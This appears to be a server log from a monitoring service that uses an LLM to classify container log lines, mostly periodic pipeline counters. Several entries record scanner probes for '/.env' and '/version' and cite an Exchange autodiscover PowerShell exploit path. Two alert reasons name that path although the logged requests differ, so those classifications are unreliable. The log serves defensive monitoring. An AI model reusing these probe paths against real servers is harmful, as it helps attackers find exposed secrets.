Mar 20 07:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:22:01.970195 [observer] Pipeline: processed=2770 pattern_hits=2711 llm_calls=59 llm_errors=0 learned=0
Mar 20 07:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:22:01.970226 [observer] Patterns: hash=2711 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59
Mar 20 07:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:22:31.935577 [observer] Pipeline: processed=2774 pattern_hits=2715 llm_calls=59 llm_errors=0 learned=0
Mar 20 07:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:22:31.935605 [observer] Patterns: hash=2715 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59
Mar 20 07:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:23:01.950115 [observer] Pipeline: processed=2776 pattern_hits=2717 llm_calls=59 llm_errors=0 learned=0
Mar 20 07:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:23:01.950143 [observer] Patterns: hash=2717 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59
Mar 20 07:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:23:31.948748 [observer] Pipeline: processed=2778 pattern_hits=2719 llm_calls=59 llm_errors=0 learned=0
Mar 20 07:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:23:31.948779 [observer] Patterns: hash=2719 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59
Mar 20 07:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:24:01.981938 [observer] Pipeline: processed=2782 pattern_hits=2723 llm_calls=59 llm_errors=0 learned=0
Mar 20 07:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:24:01.981971 [observer] Patterns: hash=2723 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59
Mar 20 07:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:24:31.945075 [observer] Pipeline: processed=2784 pattern_hits=2725 llm_calls=59 llm_errors=0 learned=0
Mar 20 07:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:24:31.945109 [observer] Patterns: hash=2725 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59
Mar 20 07:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:25:01.973458 [observer] Pipeline: processed=2790 pattern_hits=2731 llm_calls=59 llm_errors=0 learned=0
Mar 20 07:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:25:01.973495 [observer] Patterns: hash=2731 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59
Mar 20 07:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:25:31.936189 [observer] Pipeline: processed=2792 pattern_hits=2733 llm_calls=59 llm_errors=0 learned=0
Mar 20 07:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:25:31.936219 [observer] Patterns: hash=2733 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59
Mar 20 07:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:26:01.943051 [observer] Pipeline: processed=2796 pattern_hits=2737 llm_calls=59 llm_errors=0 learned=0
Mar 20 07:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:26:01.943932 [observer] Patterns: hash=2737 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59
Mar 20 07:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:26:31.934690 [observer] Pipeline: processed=2798 pattern_hits=2739 llm_calls=59 llm_errors=0 learned=0
Mar 20 07:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:26:31.934714 [observer] Patterns: hash=2739 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59
Mar 20 07:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:27:01.947178 [observer] Pipeline: processed=2800 pattern_hits=2741 llm_calls=59 llm_errors=0 learned=0
Mar 20 07:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:27:01.947210 [observer] Patterns: hash=2741 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59
Mar 20 07:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:27:31.936359 [observer] Pipeline: processed=2804 pattern_hits=2745 llm_calls=59 llm_errors=0 learned=0
Mar 20 07:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:27:31.936381 [observer] Patterns: hash=2745 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59
Mar 20 07:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:28:01.955621 [observer] Pipeline: processed=2806 pattern_hits=2747 llm_calls=59 llm_errors=0 learned=0
Mar 20 07:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:28:01.955657 [observer] Patterns: hash=2747 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59
Mar 20 07:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:28:31.933911 [observer] Pipeline: processed=2810 pattern_hits=2751 llm_calls=59 llm_errors=0 learned=0
Mar 20 07:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:28:31.933936 [observer] Patterns: hash=2751 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59
Mar 20 07:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:29:01.957961 [observer] Pipeline: processed=2812 pattern_hits=2753 llm_calls=59 llm_errors=0 learned=0
Mar 20 07:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:29:01.957993 [observer] Patterns: hash=2753 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59
Mar 20 07:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:29:31.935609 [observer] Pipeline: processed=2816 pattern_hits=2757 llm_calls=59 llm_errors=0 learned=0
Mar 20 07:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:29:31.935641 [observer] Patterns: hash=2757 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59
Mar 20 07:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:30:01.950984 [observer] Pipeline: processed=2818 pattern_hits=2759 llm_calls=59 llm_errors=0 learned=0
Mar 20 07:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:30:01.951018 [observer] Patterns: hash=2759 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59
Mar 20 07:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:30:31.952294 [observer] Pipeline: processed=2822 pattern_hits=2763 llm_calls=59 llm_errors=0 learned=0
Mar 20 07:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:30:31.952319 [observer] Patterns: hash=2763 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59
Mar 20 07:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:31:01.947068 [observer] Pipeline: processed=2826 pattern_hits=2767 llm_calls=59 llm_errors=0 learned=0
Mar 20 07:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:31:01.947097 [observer] Patterns: hash=2767 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59
Mar 20 07:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:31:31.945756 [observer] Pipeline: processed=2828 pattern_hits=2769 llm_calls=59 llm_errors=0 learned=0
Mar 20 07:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:31:31.945787 [observer] Patterns: hash=2769 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59
Mar 20 07:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:32:01.946586 [observer] Pipeline: processed=2832 pattern_hits=2773 llm_calls=59 llm_errors=0 learned=0
Mar 20 07:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:32:01.946613 [observer] Patterns: hash=2773 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59
Mar 20 07:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:32:31.939518 [observer] Pipeline: processed=2834 pattern_hits=2775 llm_calls=59 llm_errors=0 learned=0
Mar 20 07:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:32:31.939551 [observer] Patterns: hash=2775 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59
Mar 20 07:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:33:01.937587 [observer] Pipeline: processed=2838 pattern_hits=2779 llm_calls=59 llm_errors=0 learned=0
Mar 20 07:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:33:01.937614 [observer] Patterns: hash=2779 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59
Mar 20 07:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:33:31.934797 [observer] Pipeline: processed=2840 pattern_hits=2781 llm_calls=59 llm_errors=0 learned=0
Mar 20 07:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:33:31.934825 [observer] Patterns: hash=2781 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59
Mar 20 07:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:34:01.958118 [observer] Pipeline: processed=2842 pattern_hits=2783 llm_calls=59 llm_errors=0 learned=0
Mar 20 07:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:34:01.958148 [observer] Patterns: hash=2783 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59
Mar 20 07:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:34:31.934130 [observer] Pipeline: processed=2846 pattern_hits=2787 llm_calls=59 llm_errors=0 learned=0
Mar 20 07:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:34:31.934153 [observer] Patterns: hash=2787 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59
Mar 20 07:34:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:34:54.717107 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.70 action=allow pattern_type=prefix
Mar 20 07:34:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:34:54.717147 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern
Mar 20 07:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:35:01.966131 [observer] Pipeline: processed=2850 pattern_hits=2789 llm_calls=61 llm_errors=0 learned=0
Mar 20 07:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:35:01.966759 [observer] Patterns: hash=2789 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=61
Mar 20 07:35:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:35:03.748256 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 07:35:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:35:03.748303 [analyzer] Source hint mismatch: LLM says "tc-qos-helper", actual is "captain-netdata-container" — skipping pattern
Mar 20 07:35:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:35:08.649947 [analyzer] LLM verdict for docker:captain-netdata-container: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 07:35:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:35:08.649979 [SUSPICIOUS] Source=docker:captain-netdata-container Reason=A missing configuration file warning could indicate misconfiguration or incomplete setup, which is noteworthy but not confirmed as malicious. Line=2026-03-20T07:34:47.587141727Z 2026-03-20 07:34:47: tc-qos-helper.sh: WARNING: Cannot find file '/etc/netdata/tc-qos-helper.conf'.
Mar 20 07:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:35:31.935385 [observer] Pipeline: processed=2857 pattern_hits=2795 llm_calls=62 llm_errors=0 learned=0
Mar 20 07:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:35:31.935415 [observer] Patterns: hash=2795 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=62
Mar 20 07:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:36:01.947958 [observer] Pipeline: processed=2860 pattern_hits=2798 llm_calls=62 llm_errors=0 learned=0
Mar 20 07:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:36:01.947989 [observer] Patterns: hash=2798 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=62
Mar 20 07:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:36:31.935422 [observer] Pipeline: processed=2864 pattern_hits=2802 llm_calls=62 llm_errors=0 learned=0
Mar 20 07:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:36:31.935446 [observer] Patterns: hash=2802 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=62
Mar 20 07:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:37:01.941639 [observer] Pipeline: processed=2866 pattern_hits=2804 llm_calls=62 llm_errors=0 learned=0
Mar 20 07:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:37:01.941669 [observer] Patterns: hash=2804 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=62
Mar 20 07:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:37:31.950492 [observer] Pipeline: processed=2868 pattern_hits=2806 llm_calls=62 llm_errors=0 learned=0
Mar 20 07:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:37:31.950524 [observer] Patterns: hash=2806 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=62
Mar 20 07:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:38:01.943513 [observer] Pipeline: processed=2872 pattern_hits=2810 llm_calls=62 llm_errors=0 learned=0
Mar 20 07:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:38:01.943539 [observer] Patterns: hash=2810 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=62
Mar 20 07:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:38:31.937325 [observer] Pipeline: processed=2874 pattern_hits=2812 llm_calls=62 llm_errors=0 learned=0
Mar 20 07:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:38:31.937415 [observer] Patterns: hash=2812 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=62
Mar 20 07:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:39:01.964081 [observer] Pipeline: processed=2878 pattern_hits=2816 llm_calls=62 llm_errors=0 learned=0
Mar 20 07:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:39:01.964112 [observer] Patterns: hash=2816 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=62
Mar 20 07:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:39:31.943576 [observer] Pipeline: processed=2880 pattern_hits=2818 llm_calls=62 llm_errors=0 learned=0
Mar 20 07:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:39:31.943608 [observer] Patterns: hash=2818 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=62
Mar 20 07:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:40:01.948281 [observer] Pipeline: processed=2884 pattern_hits=2822 llm_calls=62 llm_errors=0 learned=0
Mar 20 07:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:40:01.948312 [observer] Patterns: hash=2822 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=62
Mar 20 07:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:40:31.933990 [observer] Pipeline: processed=2888 pattern_hits=2826 llm_calls=62 llm_errors=0 learned=0
Mar 20 07:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:40:31.934013 [observer] Patterns: hash=2826 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=62
Mar 20 07:40:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:40:51.888187 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An access attempt to a sensitive file (.env) via HTTP, which is a common probe for exposed configuration data. Line=2026-03-20T07:40:51.887886590Z 2026/03/20 07:40:51 [error] 422#422: *747005 open() "/usr/share/nginx/default/.env" failed (2: No such file or directory), client: 198.37.118.111, server: _, request: "G...
Mar 20 07:40:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:40:51.888261 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T07:40:51.887896314Z 198.37.118.111 - - [20/Mar/2026:07:40:51 +0000] "54.200.221.0" "GET /.env HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, li...
Mar 20 07:40:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:40:52.398039 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 405 on POST to root from an external IP suggests potential probing or misconfigured client attempting forbidden method; notable but not definitive threat. Line=2026-03-20T07:40:52.397751592Z 198.37.118.111 - - [20/Mar/2026:07:40:52 +0000] "54.200.221.0" "POST / HTTP/1.1" 405 552 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like G...
Mar 20 07:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:41:01.948699 [observer] Pipeline: processed=2893 pattern_hits=2831 llm_calls=62 llm_errors=0 learned=0
Mar 20 07:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:41:01.948728 [observer] Patterns: hash=2831 prefix=0 regex=0 contains=0 deny=10 alert=37 suppress=0 misses=62
Mar 20 07:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:41:31.933917 [observer] Pipeline: processed=2897 pattern_hits=2835 llm_calls=62 llm_errors=0 learned=0
Mar 20 07:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:41:31.933942 [observer] Patterns: hash=2835 prefix=0 regex=0 contains=0 deny=10 alert=37 suppress=0 misses=62
Mar 20 07:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:42:01.936707 [observer] Pipeline: processed=2899 pattern_hits=2837 llm_calls=62 llm_errors=0 learned=0
Mar 20 07:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:42:01.936733 [observer] Patterns: hash=2837 prefix=0 regex=0 contains=0 deny=10 alert=37 suppress=0 misses=62
Mar 20 07:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:42:31.936955 [observer] Pipeline: processed=2903 pattern_hits=2841 llm_calls=62 llm_errors=0 learned=0
Mar 20 07:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:42:31.936988 [observer] Patterns: hash=2841 prefix=0 regex=0 contains=0 deny=10 alert=37 suppress=0 misses=62
Mar 20 07:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:43:01.949109 [observer] Pipeline: processed=2905 pattern_hits=2843 llm_calls=62 llm_errors=0 learned=0
Mar 20 07:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:43:01.949142 [observer] Patterns: hash=2843 prefix=0 regex=0 contains=0 deny=10 alert=37 suppress=0 misses=62
Mar 20 07:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:43:31.935833 [observer] Pipeline: processed=2909 pattern_hits=2847 llm_calls=62 llm_errors=0 learned=0
Mar 20 07:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:43:31.935983 [observer] Patterns: hash=2847 prefix=0 regex=0 contains=0 deny=10 alert=37 suppress=0 misses=62
Mar 20 07:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:44:01.961142 [observer] Pipeline: processed=2911 pattern_hits=2849 llm_calls=62 llm_errors=0 learned=0
Mar 20 07:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:44:01.961190 [observer] Patterns: hash=2849 prefix=0 regex=0 contains=0 deny=10 alert=37 suppress=0 misses=62
Mar 20 07:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:44:31.951678 [observer] Pipeline: processed=2913 pattern_hits=2851 llm_calls=62 llm_errors=0 learned=0
Mar 20 07:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:44:31.951706 [observer] Patterns: hash=2851 prefix=0 regex=0 contains=0 deny=10 alert=37 suppress=0 misses=62
Mar 20 07:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:45:01.938625 [observer] Pipeline: processed=2917 pattern_hits=2855 llm_calls=62 llm_errors=0 learned=0
Mar 20 07:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:45:01.938651 [observer] Patterns: hash=2855 prefix=0 regex=0 contains=0 deny=10 alert=37 suppress=0 misses=62
Mar 20 07:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:45:31.937101 [observer] Pipeline: processed=2921 pattern_hits=2859 llm_calls=62 llm_errors=0 learned=0
Mar 20 07:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:45:31.937131 [observer] Patterns: hash=2859 prefix=0 regex=0 contains=0 deny=10 alert=37 suppress=0 misses=62
Mar 20 07:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:46:01.955986 [observer] Pipeline: processed=2925 pattern_hits=2863 llm_calls=62 llm_errors=0 learned=0
Mar 20 07:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:46:01.956024 [observer] Patterns: hash=2863 prefix=0 regex=0 contains=0 deny=10 alert=37 suppress=0 misses=62
Mar 20 07:46:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:46:26.967115 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 07:46:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:46:26.967155 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An attempt to access the version endpoint resulting in a file-not-found error. Could indicate probing for version information or misconfiguration; not definitive malicious activity but warrants scrutiny. Line=2026-03-20T07:46:19.020916181Z 2026/03/20 07:46:19 [error] 422#422: *747056 open() "/usr/share/nginx/default/version" failed (2: No such file or directory), client: 40.80.200.216, server: _, request: ...
Mar 20 07:46:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:46:26.967259 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T07:46:19.021008008Z 40.80.200.216 - - [20/Mar/2026:07:46:19 +0000] "54.200.221.0" "GET /version HTTP/1.1" 404 2401 "-" "Mozilla/5.0 zgrab/0.x" "-"
Mar 20 07:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:46:31.937557 [observer] Pipeline: processed=2929 pattern_hits=2866 llm_calls=63 llm_errors=0 learned=0
Mar 20 07:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:46:31.937585 [observer] Patterns: hash=2866 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 07:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:47:01.955102 [observer] Pipeline: processed=2933 pattern_hits=2870 llm_calls=63 llm_errors=0 learned=0
Mar 20 07:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:47:01.955137 [observer] Patterns: hash=2870 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 07:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:47:31.941960 [observer] Pipeline: processed=2935 pattern_hits=2872 llm_calls=63 llm_errors=0 learned=0
Mar 20 07:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:47:31.941983 [observer] Patterns: hash=2872 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 07:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:48:01.955481 [observer] Pipeline: processed=2937 pattern_hits=2874 llm_calls=63 llm_errors=0 learned=0
Mar 20 07:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:48:01.955508 [observer] Patterns: hash=2874 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 07:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:48:31.938315 [observer] Pipeline: processed=2941 pattern_hits=2878 llm_calls=63 llm_errors=0 learned=0
Mar 20 07:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:48:31.938340 [observer] Patterns: hash=2878 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 07:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:49:01.958715 [observer] Pipeline: processed=2943 pattern_hits=2880 llm_calls=63 llm_errors=0 learned=0
Mar 20 07:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:49:01.958749 [observer] Patterns: hash=2880 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 07:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:49:31.934015 [observer] Pipeline: processed=2947 pattern_hits=2884 llm_calls=63 llm_errors=0 learned=0
Mar 20 07:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:49:31.934044 [observer] Patterns: hash=2884 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 07:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:50:01.941962 [observer] Pipeline: processed=2949 pattern_hits=2886 llm_calls=63 llm_errors=0 learned=0
Mar 20 07:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:50:01.941992 [observer] Patterns: hash=2886 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 07:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:50:31.935097 [observer] Pipeline: processed=2955 pattern_hits=2892 llm_calls=63 llm_errors=0 learned=0
Mar 20 07:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:50:31.935126 [observer] Patterns: hash=2892 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 07:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:51:01.957856 [observer] Pipeline: processed=2957 pattern_hits=2894 llm_calls=63 llm_errors=0 learned=0
Mar 20 07:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:51:01.957994 [observer] Patterns: hash=2894 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 07:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:51:31.951106 [observer] Pipeline: processed=2959 pattern_hits=2896 llm_calls=63 llm_errors=0 learned=0
Mar 20 07:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:51:31.951134 [observer] Patterns: hash=2896 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 07:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:52:01.982120 [observer] Pipeline: processed=2963 pattern_hits=2900 llm_calls=63 llm_errors=0 learned=0
Mar 20 07:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:52:01.982150 [observer] Patterns: hash=2900 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 07:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:52:31.944545 [observer] Pipeline: processed=2965 pattern_hits=2902 llm_calls=63 llm_errors=0 learned=0
Mar 20 07:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:52:31.944568 [observer] Patterns: hash=2902 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 07:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:53:01.965501 [observer] Pipeline: processed=2969 pattern_hits=2906 llm_calls=63 llm_errors=0 learned=0
Mar 20 07:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:53:01.965620 [observer] Patterns: hash=2906 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 07:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:53:31.944517 [observer] Pipeline: processed=2971 pattern_hits=2908 llm_calls=63 llm_errors=0 learned=0
Mar 20 07:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:53:31.944543 [observer] Patterns: hash=2908 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 07:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:54:01.956859 [observer] Pipeline: processed=2975 pattern_hits=2912 llm_calls=63 llm_errors=0 learned=0
Mar 20 07:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:54:01.956905 [observer] Patterns: hash=2912 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 07:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:54:31.939950 [observer] Pipeline: processed=2977 pattern_hits=2914 llm_calls=63 llm_errors=0 learned=0
